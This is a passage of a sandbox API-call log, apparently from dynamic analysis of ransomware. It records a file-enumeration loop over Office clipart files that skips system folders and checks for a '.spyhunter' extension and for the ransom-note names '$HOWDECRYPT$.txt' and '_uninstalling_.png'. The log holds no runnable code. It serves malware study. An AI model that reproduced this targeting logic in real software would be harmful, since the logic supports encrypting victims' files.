lpString2="$HOWDECRYPT$.txt") returned 1 [0098.215] lstrcmpW (lpString1="J0105846.WMF", lpString2="_uninstalling_.png") returned 1 [0098.216] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105846.WMF") returned 67 [0098.216] GetProcessHeap () returned 0x2c0000 [0098.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c30df8 [0098.216] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2500) returned 0x2c16890 [0098.216] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.216] lstrcmpiW (lpString1="J0105912.WMF", lpString2="Windows") returned -1 [0098.216] lstrlenW (lpString="Windows") returned 7 [0098.216] lstrcmpiW (lpString1="J0105912.WMF", lpString2="$Recycle.bin") returned 1 [0098.216] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.216] lstrcmpiW (lpString1="J0105912.WMF", lpString2="System Volume Information") returned -1 [0098.216] lstrlenW (lpString="System Volume Information") returned 25 [0098.216] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF") returned 67 [0098.216] StrStrIW (lpFirst="J0105912.WMF", lpSrch=".spyhunter") returned 0x0 [0098.216] lstrcmpW (lpString1="J0105912.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.216] lstrcmpW (lpString1="J0105912.WMF", lpString2="_uninstalling_.png") returned 1 [0098.216] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF") returned 67 [0098.216] GetProcessHeap () returned 0x2c0000 [0098.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c30ec8 [0098.216] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2508) returned 0x2c16890 [0098.216] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.216] lstrcmpiW (lpString1="J0105974.WMF", lpString2="Windows") returned -1 [0098.217] lstrlenW (lpString="Windows") returned 7 [0098.217] lstrcmpiW (lpString1="J0105974.WMF", lpString2="$Recycle.bin") returned 1 [0098.217] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.217] lstrcmpiW (lpString1="J0105974.WMF", lpString2="System Volume Information") returned -1 [0098.217] lstrlenW (lpString="System Volume Information") returned 25 [0098.217] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF") returned 67 [0098.217] StrStrIW (lpFirst="J0105974.WMF", lpSrch=".spyhunter") returned 0x0 [0098.217] lstrcmpW (lpString1="J0105974.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.217] lstrcmpW (lpString1="J0105974.WMF", lpString2="_uninstalling_.png") returned 1 [0098.217] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF") returned 67 [0098.217] GetProcessHeap () returned 0x2c0000 [0098.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c30f98 [0098.217] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2510) returned 0x2c16890 [0098.217] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.217] lstrcmpiW (lpString1="J0106020.WMF", lpString2="Windows") returned -1 [0098.217] lstrlenW (lpString="Windows") returned 7 [0098.217] lstrcmpiW (lpString1="J0106020.WMF", lpString2="$Recycle.bin") returned 1 [0098.217] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.217] lstrcmpiW (lpString1="J0106020.WMF", lpString2="System Volume Information") returned -1 [0098.217] lstrlenW (lpString="System Volume Information") returned 25 [0098.217] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 67 [0098.218] StrStrIW (lpFirst="J0106020.WMF", lpSrch=".spyhunter") returned 0x0 [0098.218] lstrcmpW (lpString1="J0106020.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.218] lstrcmpW (lpString1="J0106020.WMF", lpString2="_uninstalling_.png") returned 1 [0098.218] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 67 [0098.218] GetProcessHeap () returned 0x2c0000 [0098.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c31068 [0098.218] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2518) returned 0x2c16890 [0098.218] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.218] lstrcmpiW (lpString1="J0106124.WMF", lpString2="Windows") returned -1 [0098.218] lstrlenW (lpString="Windows") returned 7 [0098.218] lstrcmpiW (lpString1="J0106124.WMF", lpString2="$Recycle.bin") returned 1 [0098.218] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.218] lstrcmpiW (lpString1="J0106124.WMF", lpString2="System Volume Information") returned -1 [0098.218] lstrlenW (lpString="System Volume Information") returned 25 [0098.218] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF") returned 67 [0098.218] StrStrIW (lpFirst="J0106124.WMF", lpSrch=".spyhunter") returned 0x0 [0098.218] lstrcmpW (lpString1="J0106124.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.218] lstrcmpW (lpString1="J0106124.WMF", lpString2="_uninstalling_.png") returned 1 [0098.218] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF") returned 67 [0098.218] GetProcessHeap () returned 0x2c0000 [0098.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c31138 [0098.218] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2520) returned 0x2c16890 [0098.219] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.219] lstrcmpiW (lpString1="J0106146.WMF", lpString2="Windows") returned -1 [0098.219] lstrlenW (lpString="Windows") returned 7 [0098.219] lstrcmpiW (lpString1="J0106146.WMF", lpString2="$Recycle.bin") returned 1 [0098.219] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.219] lstrcmpiW (lpString1="J0106146.WMF", lpString2="System Volume Information") returned -1 [0098.219] lstrlenW (lpString="System Volume Information") returned 25 [0098.219] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF") returned 67 [0098.219] StrStrIW (lpFirst="J0106146.WMF", lpSrch=".spyhunter") returned 0x0 [0098.219] lstrcmpW (lpString1="J0106146.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.219] lstrcmpW (lpString1="J0106146.WMF", lpString2="_uninstalling_.png") returned 1 [0098.219] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF") returned 67 [0098.219] GetProcessHeap () returned 0x2c0000 [0098.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c31208 [0098.219] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2528) returned 0x2c16890 [0098.219] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.219] lstrcmpiW (lpString1="J0106208.WMF", lpString2="Windows") returned -1 [0098.219] lstrlenW (lpString="Windows") returned 7 [0098.219] lstrcmpiW (lpString1="J0106208.WMF", lpString2="$Recycle.bin") returned 1 [0098.219] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.219] lstrcmpiW (lpString1="J0106208.WMF", lpString2="System Volume Information") returned -1 [0098.220] lstrlenW (lpString="System Volume Information") returned 25 [0098.220] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF") returned 67 [0098.220] StrStrIW (lpFirst="J0106208.WMF", lpSrch=".spyhunter") returned 0x0 [0098.220] lstrcmpW (lpString1="J0106208.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.220] lstrcmpW (lpString1="J0106208.WMF", lpString2="_uninstalling_.png") returned 1 [0098.220] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF") returned 67 [0098.220] GetProcessHeap () returned 0x2c0000 [0098.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c312d8 [0098.220] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2530) returned 0x2c16890 [0098.220] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.223] lstrcmpiW (lpString1="J0106222.WMF", lpString2="Windows") returned -1 [0098.223] lstrlenW (lpString="Windows") returned 7 [0098.223] lstrcmpiW (lpString1="J0106222.WMF", lpString2="$Recycle.bin") returned 1 [0098.223] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.223] lstrcmpiW (lpString1="J0106222.WMF", lpString2="System Volume Information") returned -1 [0098.223] lstrlenW (lpString="System Volume Information") returned 25 [0098.223] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 67 [0098.223] StrStrIW (lpFirst="J0106222.WMF", lpSrch=".spyhunter") returned 0x0 [0098.223] lstrcmpW (lpString1="J0106222.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.223] lstrcmpW (lpString1="J0106222.WMF", lpString2="_uninstalling_.png") returned 1 [0098.224] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 67 [0098.224] GetProcessHeap () returned 0x2c0000 [0098.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1a6e0 [0098.224] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2530) returned 0x2c16890 [0098.224] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.224] lstrcmpiW (lpString1="J0106572.WMF", lpString2="Windows") returned -1 [0098.224] lstrlenW (lpString="Windows") returned 7 [0098.224] lstrcmpiW (lpString1="J0106572.WMF", lpString2="$Recycle.bin") returned 1 [0098.224] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.224] lstrcmpiW (lpString1="J0106572.WMF", lpString2="System Volume Information") returned -1 [0098.224] lstrlenW (lpString="System Volume Information") returned 25 [0098.224] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 67 [0098.224] StrStrIW (lpFirst="J0106572.WMF", lpSrch=".spyhunter") returned 0x0 [0098.224] lstrcmpW (lpString1="J0106572.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.224] lstrcmpW (lpString1="J0106572.WMF", lpString2="_uninstalling_.png") returned 1 [0098.224] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 67 [0098.224] GetProcessHeap () returned 0x2c0000 [0098.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c313a8 [0098.224] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2538) returned 0x2c16890 [0098.224] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.225] lstrcmpiW (lpString1="J0106816.WMF", lpString2="Windows") returned -1 [0098.225] lstrlenW (lpString="Windows") returned 7 [0098.225] lstrcmpiW (lpString1="J0106816.WMF", lpString2="$Recycle.bin") returned 1 [0098.225] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.225] lstrcmpiW (lpString1="J0106816.WMF", lpString2="System Volume Information") returned -1 [0098.225] lstrlenW (lpString="System Volume Information") returned 25 [0098.225] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 67 [0098.225] StrStrIW (lpFirst="J0106816.WMF", lpSrch=".spyhunter") returned 0x0 [0098.225] lstrcmpW (lpString1="J0106816.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.225] lstrcmpW (lpString1="J0106816.WMF", lpString2="_uninstalling_.png") returned 1 [0098.225] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 67 [0098.225] GetProcessHeap () returned 0x2c0000 [0098.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c31478 [0098.225] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2540) returned 0x2c16890 [0098.225] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.225] lstrcmpiW (lpString1="J0106958.WMF", lpString2="Windows") returned -1 [0098.225] lstrlenW (lpString="Windows") returned 7 [0098.225] lstrcmpiW (lpString1="J0106958.WMF", lpString2="$Recycle.bin") returned 1 [0098.225] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.225] lstrcmpiW (lpString1="J0106958.WMF", lpString2="System Volume Information") returned -1 [0098.225] lstrlenW (lpString="System Volume Information") returned 25 [0098.225] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 67 [0098.226] StrStrIW (lpFirst="J0106958.WMF", lpSrch=".spyhunter") returned 0x0 [0098.226] lstrcmpW (lpString1="J0106958.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.226] lstrcmpW (lpString1="J0106958.WMF", lpString2="_uninstalling_.png") returned 1 [0098.226] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 67 [0098.226] GetProcessHeap () returned 0x2c0000 [0098.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c31548 [0098.226] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2548) returned 0x2c16890 [0098.226] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.226] lstrcmpiW (lpString1="J0107024.WMF", lpString2="Windows") returned -1 [0098.226] lstrlenW (lpString="Windows") returned 7 [0098.228] lstrcmpiW (lpString1="J0107024.WMF", lpString2="$Recycle.bin") returned 1 [0098.228] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.228] lstrcmpiW (lpString1="J0107024.WMF", lpString2="System Volume Information") returned -1 [0098.228] lstrlenW (lpString="System Volume Information") returned 25 [0098.228] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF") returned 67 [0098.228] StrStrIW (lpFirst="J0107024.WMF", lpSrch=".spyhunter") returned 0x0 [0098.228] lstrcmpW (lpString1="J0107024.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.228] lstrcmpW (lpString1="J0107024.WMF", lpString2="_uninstalling_.png") returned 1 [0098.228] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107024.WMF") returned 67 [0098.228] GetProcessHeap () returned 0x2c0000 [0098.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c31618 [0098.228] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2550) returned 0x2c16890 [0098.228] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.228] lstrcmpiW (lpString1="J0107026.WMF", lpString2="Windows") returned -1 [0098.228] lstrlenW (lpString="Windows") returned 7 [0098.228] lstrcmpiW (lpString1="J0107026.WMF", lpString2="$Recycle.bin") returned 1 [0098.229] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.229] lstrcmpiW (lpString1="J0107026.WMF", lpString2="System Volume Information") returned -1 [0098.229] lstrlenW (lpString="System Volume Information") returned 25 [0098.229] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF") returned 67 [0098.229] StrStrIW (lpFirst="J0107026.WMF", lpSrch=".spyhunter") returned 0x0 [0098.229] lstrcmpW (lpString1="J0107026.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.229] lstrcmpW (lpString1="J0107026.WMF", lpString2="_uninstalling_.png") returned 1 [0098.229] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF") returned 67 [0098.229] GetProcessHeap () returned 0x2c0000 [0098.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c316e8 [0098.229] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2558) returned 0x2c16890 [0098.229] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.229] lstrcmpiW (lpString1="J0107042.WMF", lpString2="Windows") returned -1 [0098.229] lstrlenW (lpString="Windows") returned 7 [0098.229] lstrcmpiW (lpString1="J0107042.WMF", lpString2="$Recycle.bin") returned 1 [0098.229] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.229] lstrcmpiW (lpString1="J0107042.WMF", lpString2="System Volume Information") returned -1 [0098.229] lstrlenW (lpString="System Volume Information") returned 25 [0098.229] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF") returned 67 [0098.229] StrStrIW (lpFirst="J0107042.WMF", lpSrch=".spyhunter") returned 0x0 [0098.229] lstrcmpW (lpString1="J0107042.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.229] lstrcmpW (lpString1="J0107042.WMF", lpString2="_uninstalling_.png") returned 1 [0098.230] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107042.WMF") returned 67 [0098.230] GetProcessHeap () returned 0x2c0000 [0098.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c317b8 [0098.230] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2560) returned 0x2c16890 [0098.230] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.230] lstrcmpiW (lpString1="J0107090.WMF", lpString2="Windows") returned -1 [0098.230] lstrlenW (lpString="Windows") returned 7 [0098.230] lstrcmpiW (lpString1="J0107090.WMF", lpString2="$Recycle.bin") returned 1 [0098.230] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.230] lstrcmpiW (lpString1="J0107090.WMF", lpString2="System Volume Information") returned -1 [0098.230] lstrlenW (lpString="System Volume Information") returned 25 [0098.230] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF") returned 67 [0098.230] StrStrIW (lpFirst="J0107090.WMF", lpSrch=".spyhunter") returned 0x0 [0098.230] lstrcmpW (lpString1="J0107090.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.230] lstrcmpW (lpString1="J0107090.WMF", lpString2="_uninstalling_.png") returned 1 [0098.230] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF") returned 67 [0098.230] GetProcessHeap () returned 0x2c0000 [0098.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c31888 [0098.230] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2568) returned 0x2c16890 [0098.230] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.231] lstrcmpiW (lpString1="J0107130.WMF", lpString2="Windows") returned -1 [0098.231] lstrlenW (lpString="Windows") returned 7 [0098.231] lstrcmpiW (lpString1="J0107130.WMF", lpString2="$Recycle.bin") returned 1 [0098.231] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.231] lstrcmpiW (lpString1="J0107130.WMF", lpString2="System Volume Information") returned -1 [0098.231] lstrlenW (lpString="System Volume Information") returned 25 [0098.231] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF") returned 67 [0098.231] StrStrIW (lpFirst="J0107130.WMF", lpSrch=".spyhunter") returned 0x0 [0098.231] lstrcmpW (lpString1="J0107130.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.231] lstrcmpW (lpString1="J0107130.WMF", lpString2="_uninstalling_.png") returned 1 [0098.231] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF") returned 67 [0098.231] GetProcessHeap () returned 0x2c0000 [0098.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c31958 [0098.231] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2570) returned 0x2c16890 [0098.231] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.231] lstrcmpiW (lpString1="J0107132.WMF", lpString2="Windows") returned -1 [0098.231] lstrlenW (lpString="Windows") returned 7 [0098.231] lstrcmpiW (lpString1="J0107132.WMF", lpString2="$Recycle.bin") returned 1 [0098.231] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.231] lstrcmpiW (lpString1="J0107132.WMF", lpString2="System Volume Information") returned -1 [0098.231] lstrlenW (lpString="System Volume Information") returned 25 [0098.232] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF") returned 67 [0098.232] StrStrIW (lpFirst="J0107132.WMF", lpSrch=".spyhunter") returned 0x0 [0098.232] lstrcmpW (lpString1="J0107132.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.232] lstrcmpW (lpString1="J0107132.WMF", lpString2="_uninstalling_.png") returned 1 [0098.232] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF") returned 67 [0098.232] GetProcessHeap () returned 0x2c0000 [0098.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c31a28 [0098.232] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2578) returned 0x2c16890 [0098.232] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.232] lstrcmpiW (lpString1="J0107134.WMF", lpString2="Windows") returned -1 [0098.232] lstrlenW (lpString="Windows") returned 7 [0098.232] lstrcmpiW (lpString1="J0107134.WMF", lpString2="$Recycle.bin") returned 1 [0098.232] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.232] lstrcmpiW (lpString1="J0107134.WMF", lpString2="System Volume Information") returned -1 [0098.232] lstrlenW (lpString="System Volume Information") returned 25 [0098.232] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF") returned 67 [0098.232] StrStrIW (lpFirst="J0107134.WMF", lpSrch=".spyhunter") returned 0x0 [0098.232] lstrcmpW (lpString1="J0107134.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.232] lstrcmpW (lpString1="J0107134.WMF", lpString2="_uninstalling_.png") returned 1 [0098.232] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF") returned 67 [0098.232] GetProcessHeap () returned 0x2c0000 [0098.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c31af8 [0098.233] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2580) returned 0x2c16890 [0098.233] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.233] lstrcmpiW (lpString1="J0107138.WMF", lpString2="Windows") returned -1 [0098.233] lstrlenW (lpString="Windows") returned 7 [0098.233] lstrcmpiW (lpString1="J0107138.WMF", lpString2="$Recycle.bin") returned 1 [0098.233] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.233] lstrcmpiW (lpString1="J0107138.WMF", lpString2="System Volume Information") returned -1 [0098.233] lstrlenW (lpString="System Volume Information") returned 25 [0098.233] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF") returned 67 [0098.233] StrStrIW (lpFirst="J0107138.WMF", lpSrch=".spyhunter") returned 0x0 [0098.233] lstrcmpW (lpString1="J0107138.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.233] lstrcmpW (lpString1="J0107138.WMF", lpString2="_uninstalling_.png") returned 1 [0098.233] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF") returned 67 [0098.233] GetProcessHeap () returned 0x2c0000 [0098.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c31bc8 [0098.233] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2588) returned 0x2c16890 [0098.233] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.233] lstrcmpiW (lpString1="J0107146.WMF", lpString2="Windows") returned -1 [0098.233] lstrlenW (lpString="Windows") returned 7 [0098.233] lstrcmpiW (lpString1="J0107146.WMF", lpString2="$Recycle.bin") returned 1 [0098.234] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.234] lstrcmpiW (lpString1="J0107146.WMF", lpString2="System Volume Information") returned -1 [0098.234] lstrlenW (lpString="System Volume Information") returned 25 [0098.234] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF") returned 67 [0098.234] StrStrIW (lpFirst="J0107146.WMF", lpSrch=".spyhunter") returned 0x0 [0098.234] lstrcmpW (lpString1="J0107146.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.234] lstrcmpW (lpString1="J0107146.WMF", lpString2="_uninstalling_.png") returned 1 [0098.234] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF") returned 67 [0098.234] GetProcessHeap () returned 0x2c0000 [0098.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c31c98 [0098.234] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2590) returned 0x2c16890 [0098.234] FindNextFileW (in: hFindFile=0x335f60, 